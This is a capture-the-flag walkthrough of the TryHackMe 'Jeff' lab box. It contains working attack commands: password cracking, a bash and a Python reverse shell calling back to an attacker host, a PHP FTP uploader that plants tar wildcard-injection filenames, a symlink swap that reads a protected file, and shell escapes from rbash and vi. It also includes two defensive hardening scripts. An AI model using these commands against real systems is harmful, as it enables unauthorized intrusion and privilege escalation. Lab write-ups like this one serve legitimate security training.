TryHackMe-Jeff

Room link: Jeff

0x01 Information Gathering

```shell
# >> appends the entry; a single > would overwrite the whole hosts file
echo 'ip jeff.thm' >> /etc/hosts
```

NMAP

```shell
nmap -p- -sC -sV 10.10.214.2

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
| 256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
|_ 256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)
80/tcp open http nginx
|_http-title: Jeffs Portfolio
MAC Address: 02:76:70:D3:7C:07 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only two ports are open: web and SSH.

SSH

```shell
root@<attacker>:~# nc -nv 10.10.214.2 22
(UNKNOWN) [10.10.214.2] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
Protocol mismatch.
root@<attacker>:~# ssh 10.10.214.2
The authenticity of host '10.10.214.2 (10.10.214.2)' can't be established.
ECDSA key fingerprint is SHA256:81na22Hs/2kaLeyNJit8TG9Ba4kVYm9LhIObseJmCZM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.214.2' (ECDSA) to the list of known hosts.
root@10.10.214.2's password:
^C
```

I just had a quick look to see whether there was any hidden information..

HTTP

gobuster

```shell
root@<attacker>:~# gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jeff.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/16 14:07:24 Starting gobuster
===============================================================
/uploads (Status: 301)
/admin (Status: 301)
/assets (Status: 301)
/backups (Status: 301)
/source_codes (Status: 301)
===============================================================
2020/10/16 14:07:44 Finished
===============================================================
```

Homepage (screenshot)

uploads page (screenshot)

```html
<!DOCTYPE html>
<html>
<head>
<title>Jeff's file uploader</title>
</head>
<body>

<form action="#">
<input type="file" name="upload_file" />
<input type="submit" value="Upload">
</form>

</body>
</html>
```

The form action is empty.

admin and source_codes both serve blank pages. backups shows the text "Jeff.thm"; assets returns 403.

```shell
gobuster dir -u http://jeff.thm/backups/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,gzip,rar
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jeff.thm/backups/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: zip,gzip,rar
[+] Timeout: 10s
===============================================================
2020/10/17 05:04:53 Starting gobuster
===============================================================
/backup.zip (Status: 200)
```

Extracting it requires a password.

```shell
zip2john backup.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
john --show zip.hash
backup.zip:!!Burningbird!!::backup.zip:backup/wpadmin.bak, backup/assets/EnlighterJS.min.js, backup/assets/MooTools-Core-1.6.0-compressed.js:backup.zip
```

Contents of wpadmin.bak

```
wordpress password is: phO#g)C5dhIWZn3BKP
```

There's a WordPress? But the scan didn't find it.. Let's try brute-forcing subdomains.

```shell
wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://jeff.thm/" -H "Host: FUZZ.jeff.thm" --hl 1

Target: http://jeff.thm/
Total requests: 4997
==================================================================
ID Response Lines Word Chars Request
==================================================================
00326: C=200 346 L 1455 W 25901 Ch "wordpress"

Total time: 0
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 0
```

Next, append ip wordpress.jeff.thm to /etc/hosts.


The user should be jeff.

Login successful (screenshot)

Edit the akismet/akismet.php plugin directly and add:

```php
system('bash -c "bash -i >&/dev/tcp/ip/1234 0>&1"');
```


Once edited, just activate the plugin. (Browsing to the plugin directory directly doesn't work, because the target returns 403 for that directory.)

0x02 Privilege Escalation

Container


After some information gathering I realised this is a Docker container... Still, there's an interesting file to be found in the wordpress directory.

```php
<?php
/*
Todo: I need to finish coding this database backup script.
also maybe convert it to a wordpress plugin in the future.
*/
$dbFile = 'db_backup/backup.sql';
$ftpFile = 'backup.sql';

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";

$ftp = ftp_connect("172.20.0.1"); // todo, set up /etc/hosts for the container host

if( ! ftp_login($ftp, $username, $password) ){
die("FTP Login failed.");
}

$msg = "Upload failed";
if (ftp_put($ftp, $remote_file, $file, FTP_ASCII)) {
$msg = "$file was uploaded.\n";
}

echo $msg;
ftp_close($conn_id);
```

Here we already have an FTP user's credentials. I tried logging in over SSH as this user, but that failed. My guess is that once something is uploaded, an archiving program runs on the FTP server.

Create shell.sh with the following content, plus two empty files a.txt and b.txt.

```shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])"
```

The modified ftp_backup.php

```php
<?php
// Credentials recovered from the original ftp_backup.php
$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";
// Remote names: the script itself plus two files whose names
// the archiving job on the FTP host will parse as tar options
$ftpfile_sh = "shell.sh";
$ftpfile_1 = "--checkpoint=1";
$ftpfile_2 = "--checkpoint-action=exec=sh shell.sh";

$ftp = ftp_connect("172.20.0.1");

if (!ftp_login($ftp, $username, $password)) {
    echo 'die!!!';
    die("FTP Login failed.");
}

// Use an active-mode data connection
ftp_pasv($ftp, false);

echo PHP_EOL;
print_r(ftp_nlist($ftp, "/"));

ftp_chdir($ftp, "files");
print_r(ftp_nlist($ftp, "."));
print_r(ftp_pwd($ftp));

// Upload the three local files under the chosen remote names
echo ftp_put($ftp, $ftpfile_sh, "./shell.sh", FTP_ASCII);
echo ftp_put($ftp, $ftpfile_1, "./a.txt", FTP_ASCII);
echo ftp_put($ftp, $ftpfile_2, "./b.txt", FTP_ASCII);

echo PHP_EOL;
print_r(ftp_nlist($ftp, "."));

ftp_close($ftp);
```

After a lot of fiddling the upload finally succeeded.. While reading PHP's FTP functions I saw ftp_exec(), but I could not get it to work no matter what.. Googling didn't make it any clearer either.. If anyone knows, please let me know.


backupmgr


This is the tar wildcard privilege escalation; once you're in, run crontab -l and you'll find a scheduled archiving script.
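
The option-shaped filenames only work because the scheduled job archives with an unquoted wildcard (something like `tar czf backup.tar *`), so every name in the directory lands in tar's argument list. As an added example, not code from the room or from this writeup, here is the shape such a backup job should take so that names beginning with `-` stay plain filenames; the `files` directory, its `shell.sh` and the marker path in `demo()` are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the room or the writeup): a backup job that cannot be
# hijacked by filenames such as "--checkpoint=1".
#
# Vulnerable pattern this replaces:   cd "$dir" && tar czf "$out" *
# The unquoted glob expands every filename into tar's argument list, so a file
# literally named "--checkpoint-action=exec=sh shell.sh" is parsed as an option.

# safe_backup SRC_DIR OUT_TGZ
# Archives the top-level entries of SRC_DIR without letting any name reach
# tar's option parser.
safe_backup() {
    src="$1"; out="$2"
    # -print0 / --null: names are NUL-delimited, and --null also enables
    # --verbatim-files-from, so a name starting with '-' is a file, not an option.
    find "$src" -mindepth 1 -maxdepth 1 -print0 \
        | tar --null -T - -czf "$out"
}

# demo: constructed "files" directory mirroring the writeup's upload (shell.sh
# plus the two option-shaped names). Returns 0 only if the marker shell.sh
# would create does NOT exist afterwards and both option-shaped names were
# archived as ordinary entries.
demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/files" || return 1
    marker="$work/pwned"
    printf 'touch %s\n' "$marker" > "$work/files/shell.sh"
    : > "$work/files/--checkpoint=1"
    : > "$work/files/--checkpoint-action=exec=sh shell.sh"

    ( cd "$work/files" && safe_backup . "$work/backup.tgz" ) || return 1

    rc=1
    if [ ! -e "$marker" ] \
       && tar -tzf "$work/backup.tgz" | grep -qxF -- './--checkpoint=1' \
       && tar -tzf "$work/backup.tgz" | grep -qxF -- './--checkpoint-action=exec=sh shell.sh'
    then
        rc=0
    fi
    rm -rf "$work"
    return $rc
}
```

Writing the glob as `./*` is a cheaper fix for the same job, but the `find | tar -T -` form also copes with names containing newlines and is the one to put in cron.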

```shell
find / -user jeff -type f 2>/dev/null
/opt/systools/systool
/var/backups/jeff.bak
```

No permission to read jeff.bak.

systool is a program: entering 1 runs ps aux, 2 prints the contents of message.txt, and 3 exits.


In the same directory as systool there is a text file

```shell
backupmgr@tryharder:/opt/systools$ cat message.txt

Jeff, you should login with your own account to view/change your password. I hope you haven't forgotten it.
```

Both files belong to the same group, pwman. message.txt can simply be deleted and replaced by a symbolic link with the same name pointing at jeff.bak.

```shell
ln -s /var/backups/jeff.bak message.txt
```

Run systool again


```
Your Password is: 123-My-N4M3-1z-J3ff-123
```
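
systool leaks jeff.bak because it prints whatever `message.txt` points at, from a directory the pwman group can write to. As an added example, not code from the room or this writeup, this is the check a helper like systool should make before reading such a file; the message and password stand-ins in `demo()` are constructed, and `show_message` is a hypothetical name.

```shell
#!/bin/sh
# Added example (not from the room or the writeup): the check systool was
# missing. A privileged helper that prints a file from a directory its callers
# can write to must not follow symlinks, otherwise
# "ln -s /var/backups/jeff.bak message.txt" turns it into a file-read oracle.

# show_message PATH EXPECTED_UID
# Prints PATH only if it is a regular file, not a symlink, owned by EXPECTED_UID.
# Exit codes: 0 ok, 2 symlink refused, 3 not a regular file, 4 wrong owner.
show_message() {
    path="$1"; owner="$2"
    if [ -L "$path" ]; then
        echo "refusing to follow symlink: $path" >&2
        return 2
    fi
    [ -f "$path" ] || { echo "not a regular file: $path" >&2; return 3; }
    [ "$(stat -c %u "$path")" = "$owner" ] || { echo "unexpected owner: $path" >&2; return 4; }
    cat "$path"
}

# demo: constructed stand-ins for message.txt and jeff.bak in a temp dir.
# Returns 0 when the genuine file is printed and the symlink swap is refused.
demo() {
    work=$(mktemp -d) || return 1
    printf 'Your Password is: <constructed secret>\n' > "$work/jeff.bak"
    printf 'Jeff, you should login with your own account.\n' > "$work/message.txt"
    me=$(id -u)

    ok=0;      show_message "$work/message.txt" "$me" >/dev/null 2>&1 || ok=$?
    # the swap from the writeup: delete message.txt, symlink it to jeff.bak
    rm "$work/message.txt" && ln -s "$work/jeff.bak" "$work/message.txt"
    blocked=0; show_message "$work/message.txt" "$me" >/dev/null 2>&1 || blocked=$?

    rm -rf "$work"
    [ "$ok" -eq 0 ] && [ "$blocked" -eq 2 ]
}
```

The `-L` test and the `cat` are separate system calls, so a shell version still has a small race window; a compiled helper should open the file with O_NOFOLLOW and verify ownership on the returned descriptor with fstat.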

Here I tried python3 -c 'import pty;pty.spawn("/bin/bash")' directly, but it didn't work. On a Linux box you can try the following to get a tty, then switch to the jeff user.

```shell
SHELL=/bin/bash script -q /dev/null
# press Ctrl-Z to background the shell
stty raw -echo
fg
reset
export TERM=xterm
```

jeff

After SSHing in as jeff, you find it's a damn rbash..

```shell
jeff@tryharder:~$ vim
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
jeff@tryharder:~$ echo $SHELL
/bin/rbash
```

After looking up escape methods, I went with this one.

```shell
ssh jeff@10.10.214.2 -t "bash --noprofile"
```
```shell
jeff@tryharder:~$ sudo -l
[sudo] password for jeff:
Matching Defaults entries for jeff on tryharder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeff may run the following commands on tryharder:
(ALL) /usr/bin/crontab
```


The crontab editor turns out to be vi, so you can escalate straight from it:

```
:!/bin/bash
```

flag

jeff's user flag

```shell
echo -n user.txt|md5
```

root's flag is in the root directory.